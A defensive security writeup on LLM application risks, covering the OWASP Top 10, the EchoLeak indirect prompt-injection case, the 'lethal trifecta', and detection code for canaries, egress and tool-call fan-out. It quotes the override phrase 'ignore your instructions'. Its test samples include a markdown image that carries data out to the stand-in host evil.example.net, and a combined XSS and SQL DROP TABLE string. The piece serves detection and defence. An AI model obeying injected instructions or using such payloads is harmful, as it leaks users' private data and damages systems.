TL;DR for defenders. Treat every LLM in your stack as an untrusted component that will eventually follow someone else's instructions. There is no patch for prompt injection - the model reads instructions and data through the same channel, by design. What works: least-privilege tool scopes, output handling as strict as you'd apply to user input, breaking the data-exfiltration leg (egress controls on what the model can render or call), a canary token in the system prompt as a leak tripwire, and logging prompts, completions, and tool calls as first-class audit events. Details and starter detections below.
Why this belongs in your threat model now
LLM-integrated applications stopped being experimental the moment they got access to real data and real actions. The clearest proof point so far is EchoLeak (CVE-2025-32711, CVSS 9.3): a zero-click vulnerability in Microsoft 365 Copilot disclosed in June 2025, where a crafted email could make Copilot exfiltrate data from the user's context - mail, files, chat history - without the victim ever clicking anything. Microsoft fixed it server-side, but the underlying class (researchers called it an "LLM scope violation") is exactly what this writeup is about: untrusted content steering a model that holds privileged access.
This wasn't novel in kind. Indirect prompt injection against LLM-integrated applications was described systematically by Greshake et al. back in early 2023, and it has been the number-one entry in every edition of the OWASP Top 10 for LLM Applications since the list existed. The gap between "known since 2023" and "still shipping exploitable in 2025's flagship products" tells you how hard the problem is - and why detection and blast-radius design matter more than waiting for a fix.
The Top 10, in one defensive pass
The 2025 list in production terms - what each risk looks like in an app you actually run, and the primary defense:
| Risk | What it looks like in production | Primary defense |
|---|---|---|
| LLM01 Prompt Injection | Untrusted content (user input, a retrieved doc, an email) steers the model's behavior | Least privilege + egress control; assume it happens |
| LLM02 Sensitive Information Disclosure | Model reveals other users' data, internal docs, or credentials it was given | Data minimization; don't give the model secrets |
| LLM03 Supply Chain | Poisoned or backdoored third-party model, adapter, or dataset | Pin versions, verify sources, inventory models like packages |
| LLM04 Data & Model Poisoning | Attacker-influenced training or fine-tuning data changes behavior | Provenance and validation on anything you train on |
| LLM05 Improper Output Handling | Model output flows into HTML, SQL, or a shell without encoding - classic injection, new source | Treat output as untrusted input; encode and parameterize |
| LLM06 Excessive Agency | The model can call tools or APIs with more permission than the task needs | Scope tools per task; human approval for consequential actions |
| LLM07 System Prompt Leakage | Instructions, and worse, any secrets inside them, get echoed out | No secrets in prompts; canary tripwire (below) |
| LLM08 Vector & Embedding Weaknesses | RAG retrieval pulls attacker-planted or cross-tenant content into context | Access control at retrieval time, source tagging |
| LLM09 Misinformation | Confident wrong answers drive real decisions | Grounding, citations, human review where it matters |
| LLM10 Unbounded Consumption | Token-burning abuse: denial of service or a shocking bill | Rate limits, quotas, per-identity cost caps |
Notice the pattern: half of these are old vulnerability classes wearing a new interface. LLM05 is unescaped output, LLM03 is supply chain, LLM10 is resource exhaustion. Your existing instincts apply. The genuinely new ones are LLM01, LLM06, and LLM08 - and they compound each other, which is where we go next.
Prompt injection, properly understood
SQL injection had a real fix: parameterized queries separate code from data. Prompt injection has no equivalent, because a transformer has one input channel. System prompt, user message, retrieved document, tool output - it's all tokens in the same context window, and the model's "instruction following" is a statistical tendency, not a security boundary. MITRE ATLAS catalogs this as AML.T0051, in two flavors that matter very differently for defense:
- Direct injection - the user attacks the model they're talking to ("ignore your instructions"). Mostly a content-policy and abuse problem; the attacker only holds their own session.
- Indirect injection - instructions hide in content the model processes on someone else's behalf: an email Copilot summarizes, a webpage an agent browses, a document RAG retrieves, a calendar invite. The victim never sees the payload. This is the one that turns into incidents, because the attacker reaches a session that isn't theirs.
A useful frame for when indirect injection becomes a real breach is what Simon Willison calls the lethal trifecta: an AI system that combines (1) access to private data, (2) exposure to untrusted content, and (3) a way to communicate externally. All three together means attacker instructions can reach private data and carry it out. EchoLeak was precisely this trifecta inside M365 Copilot - the crafted email was the untrusted content, the user's mail and files were the private data, and image/link rendering was the exfiltration channel. You usually can't remove legs one and two. Defense concentrates on leg three.
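The trifecta can be turned into a design-review check. The following is a minimal sketch, assuming you can describe each agent deployment with three booleans; `AgentCapabilities` and its field names are hypothetical and not part of any framework.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class AgentCapabilities:
    """Hypothetical description of what one agent deployment can touch."""
    reads_private_data: bool          # leg 1: mail, files, chat history
    ingests_untrusted_content: bool   # leg 2: inbound email, web pages, RAG docs
    can_communicate_externally: bool  # leg 3: image rendering, HTTP tools, send_email


def trifecta_legs(caps: AgentCapabilities) -> list[str]:
    """Return the names of the trifecta legs this deployment has."""
    legs = []
    if caps.reads_private_data:
        legs.append("private_data")
    if caps.ingests_untrusted_content:
        legs.append("untrusted_content")
    if caps.can_communicate_externally:
        legs.append("external_communication")
    return legs


def completes_trifecta(caps: AgentCapabilities) -> bool:
    """True when all three legs are present, i.e. exfiltration is possible by design."""
    return len(trifecta_legs(caps)) == 3


# A mail copilot that renders remote images has all three legs.
mail_copilot = AgentCapabilities(True, True, True)
# The same copilot with outbound rendering and network tools locked down.
locked_down = AgentCapabilities(True, True, False)
```

Running a check like this per deployment, not per product, makes it visible which agents still need leg three removed.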
What you need flowing into your SIEM
You cannot detect what you don't log, and most LLM apps today log almost nothing security-relevant. Whether you build or buy, insist on these as structured, retained, queryable events:
- Prompts and completions, with user identity, session ID, model and version, and a hash of the system prompt in effect. Mind privacy: this is sensitive data; scope retention and access accordingly.
- Tool/function calls as first-class audit events - which tool, what arguments, triggered by which session, allowed or denied. For an agent, this is your process-creation log equivalent; it's where the impact happens.
- RAG retrieval events - which documents entered the context window, from which source, for which query. When an incident happens, "what did the model read" is the first question, and without this log it's unanswerable.
- Guardrail/filter verdicts - every block, flag, or rewrite from whatever safety layer you run, even when the request proceeds. These are your IDS alerts; today most of them go nowhere.
- If you're in the Microsoft ecosystem: Copilot interactions surface in the Purview unified audit log, and Azure OpenAI deployments can emit request logs through Azure diagnostics - check what you're actually collecting; the default is usually "not enough."
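As an illustration of what a structured tool-call event could look like, here is a minimal sketch. The schema and every field name in it are assumptions, since there is no standard format yet; the one deliberate choice is logging a SHA-256 of the system prompt, not its text.

```python
import hashlib
import json
from datetime import datetime, timezone


def system_prompt_hash(system_prompt: str) -> str:
    """Log a SHA-256 of the system prompt, not the prompt text itself."""
    return hashlib.sha256(system_prompt.encode("utf-8")).hexdigest()


def tool_call_event(user_id, session_id, model, system_prompt, tool, arguments, allowed):
    """Build one structured tool-call audit event (hypothetical schema)."""
    return {
        "event_type": "llm.tool_call",
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "user_id": user_id,
        "session_id": session_id,
        "model": model,
        "system_prompt_sha256": system_prompt_hash(system_prompt),
        "tool": tool,
        "arguments": arguments,
        "decision": "allowed" if allowed else "denied",
    }


# Example values are placeholders.
event = tool_call_event(
    user_id="alice@example.com",
    session_id="sess-001",
    model="example-model-v1",
    system_prompt="You are a helpful summarizer.",
    tool="send_email",
    arguments={"to": "bob@example.com"},
    allowed=False,
)
print(json.dumps(event, sort_keys=True))  # one JSON line per event, ready to ship
```

Denied calls are logged the same way as allowed ones, because a denied `send_email` right after reading external content is exactly the event you want to find later.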
Detection strategy
Same philosophy as every UMBRASEC writeup: layers, from highest precision to broadest. Schemas below are illustrative - LLM apps don't share a standard log format yet, so adapt the field names to yours.
1. Canary token in the system prompt (near-zero false positives)
The honeypot-SPN trick, ported to LLMs. Plant a unique, meaningless marker in your system prompt and
alert if it ever appears in model output - because no legitimate completion has any reason to contain
it. One marker, two strong signals: your system prompt is leaking (LLM07), and the model
is disclosing context it was told not to - which often means an injection attempt is steering it.
# System prompt (excerpt)
# Integrity marker. Never include the following token in any response:
# UMB-CANARY-3f91c2a8
# Detection (pseudo-rule over completion logs)
alert when:
    response.text contains "UMB-CANARY-"
severity: high
action: capture full session (prompt chain, retrieved docs, tool calls)
        for review; rotate the canary after any hit
Tuning note. Use a random value per deployment, rotate it on a
schedule and after every hit, and make sure it's excluded from any prompt text you intentionally
publish. The same idea extends to RAG: seed a decoy document no honest query should retrieve, and
alert when it enters a context window - that's your honeypot for LLM08-style retrieval
abuse.
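The canary rule can be sketched in a few lines of Python. This assumes completions are available to you as plain strings; the function names and the alert fields are hypothetical, and the prefix match mirrors the pseudo-rule so that rotated values still trigger it.

```python
import secrets

CANARY_PREFIX = "UMB-CANARY-"


def new_canary() -> str:
    """Generate a fresh random canary for one deployment (8 hex characters)."""
    return CANARY_PREFIX + secrets.token_hex(4)


def check_completion(session_id: str, completion_text: str):
    """Return a high-severity alert dict if the canary prefix appears, else None."""
    if CANARY_PREFIX not in completion_text:
        return None
    return {
        "rule": "canary_in_output",
        "severity": "high",
        "session_id": session_id,
        "action": "capture full session for review; rotate the canary",
    }


canary = new_canary()
leak = check_completion("sess-001", f"My instructions say: never output {canary}")
clean = check_completion("sess-002", "Here is the summary you asked for.")
```

Matching on the prefix, not the full value, keeps the rule stable across rotations; the cost is that the prefix itself must never appear in published prompt text.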
2. Egress: watch what the model is allowed to render or call
EchoLeak exfiltrated through a rendered image URL - the data left in the query string of a request the victim's client made automatically. That channel generalizes: markdown images, auto-fetched links, and tool calls that take URLs are the standard exfiltration legs of the trifecta. Lock them down by policy, and alert on the attempts:
# Output policy (enforce before rendering / before the HTTP client fires)
- strip or neutralize markdown images and links in model output
  unless the host is on an explicit allowlist
- block tool calls whose URL/domain argument is not allowlisted
# Detection (pseudo-rule over output + tool-call logs)
alert when:
    output.contains_image_or_link AND destination.host not in allowlist
or:
    toolcall.name in ("http_get", "browse", "send_email")
    AND toolcall.argument_domain not in allowlist
    AND session.context_included_external_content == true
That last condition is the high-signal one: the model read untrusted content, then immediately tried to reach an unfamiliar destination. Legitimate sessions do this rarely; injected ones do it by construction.
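One way to enforce the output side of that policy is sketched below. It assumes model output is markdown and only handles inline `[text](url)` and `![alt](url)` syntax; reference-style links, raw HTML, and bare URLs that a client auto-links would need their own handling. The allowlist host and function name are hypothetical.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist; replace with the hosts your app really needs.
ALLOWED_HOSTS = frozenset({"docs.example.com"})

# Inline markdown links and images: optional "!", [label], (url optional-title)
MD_LINK = re.compile(r"(!?)\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")


def neutralize_links(text: str, allowed_hosts=ALLOWED_HOSTS):
    """Replace non-allowlisted links/images; return (clean_text, blocked_hosts)."""
    blocked = []

    def _replace(match):
        url = match.group(3)
        try:
            host = (urlsplit(url).hostname or "").lower()
        except ValueError:  # malformed URL: treat as not allowlisted
            host = ""
        if host in allowed_hosts:
            return match.group(0)
        blocked.append(host or url)  # feed this list to the detection rule
        label = match.group(2) or "link"
        return f"[{label}: removed by output policy]"

    return MD_LINK.sub(_replace, text), blocked


sample = (
    "See ![chart](https://evil.example.net/p.png?d=secret) "
    "and [docs](https://docs.example.com/a)."
)
clean_text, blocked_hosts = neutralize_links(sample)
```

Relative URLs have no host and are therefore blocked too; that is a strict default in this sketch, chosen so that anything ambiguous fails closed.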
3. Behavioral: tool-call fan-out and sequence anomalies
The agent equivalent of the Kerberoasting fan-out rule. A copilot answering a question touches one or two tools; a hijacked agent enumerates - reading many documents, then calling a send/export/write tool it rarely uses. Baseline per tool and per identity, then alert on the outliers:
# Pseudo-aggregation over tool-call logs
alert when, within 5m, a single session:
    calls >= N distinct tools            # fan-out (baseline N first)
    or reads >= M distinct documents     # bulk context-stuffing
    or invokes a "consequential" tool    # send_email, create_rule,
       it has never used before          # export, delete, payment
severity: medium - this is a triage feed, not a pager rule
Run it report-only for a couple of weeks, exactly as you would a new SIEM correlation rule: find your noisy legitimate automations, allowlist them, and set thresholds above your noisiest honest session.
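For teams without a SIEM query language that fits, the same aggregation can be prototyped offline. This is a minimal sketch over tool-call events held in memory; the event fields (`session_id`, `identity`, `timestamp`, `tool`, `document_id`), the thresholds, and the baseline structure are all assumptions to adapt to your own logs.

```python
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)
CONSEQUENTIAL = {"send_email", "create_rule", "export", "delete", "payment"}


def fanout_alerts(events, max_tools, max_docs, baseline_tools):
    """Flag sessions that fan out, bulk-read, or use a new consequential tool.

    baseline_tools maps identity -> set of tools that identity has used before.
    """
    by_session = defaultdict(list)
    for ev in events:
        by_session[ev["session_id"]].append(ev)

    alerts = []
    for session_id, evs in by_session.items():
        evs.sort(key=lambda e: e["timestamp"])
        reasons = set()
        for i, end in enumerate(evs):
            # All events in the 5 minutes leading up to (and including) this one.
            window = [e for e in evs[: i + 1]
                      if end["timestamp"] - e["timestamp"] <= WINDOW]
            if len({e["tool"] for e in window}) >= max_tools:
                reasons.add("tool_fanout")
            docs = {e["document_id"] for e in window if e.get("document_id")}
            if len(docs) >= max_docs:
                reasons.add("bulk_read")
            seen = baseline_tools.get(end["identity"], set())
            if end["tool"] in CONSEQUENTIAL and end["tool"] not in seen:
                reasons.add("new_consequential_tool")
        if reasons:
            alerts.append({"session_id": session_id, "severity": "medium",
                           "reasons": sorted(reasons)})
    return alerts


t0 = datetime(2025, 6, 1, 9, 0, 0)
events = [
    {"session_id": "s1", "identity": "alice", "timestamp": t0 + timedelta(seconds=20 * i),
     "tool": "read_document", "document_id": f"doc-{i}"}
    for i in range(4)
]
events.append({"session_id": "s1", "identity": "alice",
               "timestamp": t0 + timedelta(minutes=2), "tool": "send_email"})
events.append({"session_id": "s2", "identity": "bob", "timestamp": t0,
               "tool": "read_document", "document_id": "doc-9"})

alerts = fanout_alerts(events, max_tools=3, max_docs=4,
                       baseline_tools={"alice": {"read_document"},
                                       "bob": {"read_document"}})
```

The window scan is quadratic per session, which is fine for a report-only prototype but not for a production pipeline.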
Mitigation: design beats detection here
More than in any other writeup on this site, the architecture is the control. In order of impact:
- Scope tools to the task, not the product. A summarizer needs read access to one document, not a mailbox-wide search tool and an email sender. LLM06 is a permissions decision you control completely, today.
- Put a human between the model and consequential actions. Sending mail, moving money, changing configs, deleting data - require approval. Keep the approval UI honest: show the actual action and arguments, not the model's summary of them.
- Break the exfiltration leg. No unrestricted outbound fetches, no rendering remote images from model output, allowlisted domains for every tool that touches the network. If the trifecta can't complete, injection becomes much less interesting.
- Keep secrets out of prompts. System prompts leak - assume LLM07 - so API keys, internal hostnames, and customer data don't belong there. The canary should be the only "secret" in your prompt, and it's designed to leak loudly.
- Treat model output as untrusted input (LLM05): encode it before it hits HTML, parameterize it before it hits SQL, never pipe it to a shell. This one is fully solved technology; there's no excuse.
- Inventory and pin your models like any other dependency (LLM03), and put rate/cost limits on every endpoint (LLM10).
- For the formal backing when you write policy: the joint NCSC/CISA Guidelines for Secure AI System Development and NIST's AI RMF map cleanly onto everything above.
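The output-handling item needs nothing beyond the standard library. A minimal sketch, assuming a Python backend with SQLite; the table name, column names, and helper functions are hypothetical:

```python
import html
import sqlite3


def render_answer(model_output: str) -> str:
    """HTML-encode model output before it is placed into a page."""
    return f'<div class="answer">{html.escape(model_output)}</div>'


def save_answer(conn: sqlite3.Connection, session_id: str, model_output: str) -> None:
    """Store model output with a parameterized query, never string formatting."""
    conn.execute(
        "INSERT INTO answers (session_id, body) VALUES (?, ?)",
        (session_id, model_output),
    )


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE answers (session_id TEXT, body TEXT)")

# Output a hijacked model might produce: markup plus a SQL fragment.
hostile = "<img src=x onerror=alert(1)> x'); DROP TABLE answers;--"
page = render_answer(hostile)
save_answer(conn, "sess-001", hostile)
rows = conn.execute("SELECT body FROM answers").fetchall()
```

The hostile string ends up as inert text in both sinks: encoded in the page, and stored verbatim as a single row.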
Honest limitations
- There is no deterministic fix for prompt injection. Guardrail models and prompt classifiers are probabilistic - useful as a filter layer, bypassable by a motivated attacker. Anyone selling you a product that "solves" injection is selling you LLM09.
- The detections here are younger than the rest of this site's content. Windows eventing has decades of field testing; LLM telemetry has a couple of years and no standard schema. Expect to adapt everything to your own logging, and expect this writeup to age faster than the Kerberoasting one.
- The canary catches leakage, not all injection. An attack that quietly biases an answer, or exfiltrates without echoing the prompt, walks past rule #1. That's why the egress and behavioral layers exist, and why blast-radius design outranks all three.
- Vendor-hosted copilots limit your visibility. For M365 Copilot you get what Purview exposes, not raw model I/O. Push vendors on logging the same way you'd push a SaaS provider on audit APIs - it's the same ask.
References
- OWASP - Top 10 for LLM Applications (2025)
- MITRE ATLAS - AML.T0051: LLM Prompt Injection
- NVD - CVE-2025-32711 (M365 Copilot "EchoLeak" information disclosure)
- Microsoft MSRC - CVE-2025-32711 advisory
- The Hacker News - Zero-click "EchoLeak" AI vulnerability in Microsoft 365 Copilot, found by Aim Labs (Jun 2025)
- Greshake et al. - Not what you've signed up for: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection (2023)
- Simon Willison - The lethal trifecta for AI agents (Jun 2025)
- NCSC / CISA - Guidelines for Secure AI System Development (Nov 2023)
- NIST - AI Risk Management Framework
Scope note. This is a defensive writeup. It describes injection classes only to the depth a defender needs to log, detect, and contain them - it deliberately contains no working injection payloads, jailbreak strings, or evasion techniques. UMBRASEC publishes defense, not offense.